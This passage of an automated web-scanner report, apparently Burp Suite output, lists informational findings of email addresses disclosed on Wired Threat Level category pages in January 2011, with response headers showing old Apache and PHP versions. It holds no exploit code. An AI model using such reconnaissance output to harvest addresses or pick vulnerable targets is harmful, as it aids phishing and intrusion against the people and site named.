<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.59. http://www.wired.com/threatlevel/category/crime/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/crime/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:32:55 GMT
Date: Wed, 12 Jan 2011 15:29:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.60. http://www.wired.com/threatlevel/category/crypto/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/crypto/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=266
Expires: Wed, 12 Jan 2011 15:33:41 GMT
Date: Wed, 12 Jan 2011 15:29:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.61. http://www.wired.com/threatlevel/category/cybarmageddon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cybarmageddon/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:59:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=303
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:29:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.62. http://www.wired.com/threatlevel/category/cyber-warfare/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cyber-warfare/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:34:02 GMT
Date: Wed, 12 Jan 2011 15:29:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.63. http://www.wired.com/threatlevel/category/cyberbullying/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cyberbullying/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:33:22 GMT
Date: Wed, 12 Jan 2011 15:29:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.64. http://www.wired.com/threatlevel/category/cybersecurity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cybersecurity/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=170
Expires: Wed, 12 Jan 2011 15:32:31 GMT
Date: Wed, 12 Jan 2011 15:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.65. http://www.wired.com/threatlevel/category/defcon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/defcon/

Issue detail

The following email addresses were disclosed in the response:

dave@eecue.com
david_kravets@wired.com
eecue@eecue.com
john.borland@gmail.com
jya@pipeline.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
someone@wikileaks.org
threatlevel1@wired.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=167
Expires: Wed, 12 Jan 2011 15:32:33 GMT
Date: Wed, 12 Jan 2011 15:29:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>The hacker noted that ...someone@wikileaks.org writes about problems with their leader and problems with money. He sends a PDF (was published to the site recently), some chat logs, and information about the encryption process for submits that he t
...[SNIP]...
<p>The whois record for Cryptome, which is hosted by Network Solutions, listed the site contact address as jya@pipeline.com, one of Young’s accounts.</p>
...[SNIP]...
<a href="mailto:dave@eecue.com">
...[SNIP]...
<a href="mailto:threatlevel1@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:eecue@eecue.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.66. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/digital-millennium-copyright-act/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:44 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=283
Expires: Wed, 12 Jan 2011 15:34:30 GMT
Date: Wed, 12 Jan 2011 15:29:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.67. http://www.wired.com/threatlevel/category/e-voting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/e-voting/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=215
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:29:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.68. http://www.wired.com/threatlevel/category/elections/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/elections/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
editor@wired.co.uk
evan@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=263
Expires: Wed, 12 Jan 2011 15:34:13 GMT
Date: Wed, 12 Jan 2011 15:29:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:evan@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:editor@wired.co.uk">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.69. http://www.wired.com/threatlevel/category/fed-blotter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/fed-blotter/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
evan@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:05 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=189
Expires: Wed, 12 Jan 2011 15:33:06 GMT
Date: Wed, 12 Jan 2011 15:29:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:evan@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.70. http://www.wired.com/threatlevel/category/glitches-and-bugs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/glitches-and-bugs/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=158
Expires: Wed, 12 Jan 2011 15:32:37 GMT
Date: Wed, 12 Jan 2011 15:29:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.71. http://www.wired.com/threatlevel/category/hacks-and-cracks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/hacks-and-cracks/

Issue detail

The following email addresses were disclosed in the response:

brian_x_chen@wired.com
david_kravets@wired.com
john.borland@gmail.com
jya@pipeline.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
someone@wikileaks.org
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:29 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=167
Expires: Wed, 12 Jan 2011 15:32:48 GMT
Date: Wed, 12 Jan 2011 15:30:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:brian_x_chen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<p>The hacker noted that ...someone@wikileaks.org writes about problems with their leader and problems with money. He sends a PDF (was published to the site recently), some chat logs, and information about the encryption process for submits that he t
...[SNIP]...
<p>The whois record for Cryptome, which is hosted by Network Solutions, listed the site contact address as jya@pipeline.com, one of Young’s accounts.</p>
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.72. http://www.wired.com/threatlevel/category/hans-reiser-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/hans-reiser-trial/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:41 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=250
Expires: Wed, 12 Jan 2011 15:34:18 GMT
Date: Wed, 12 Jan 2011 15:30:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

18.73. http://www.wired.com/threatlevel/category/identification/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/identification/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:49 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=188
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:30:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112563

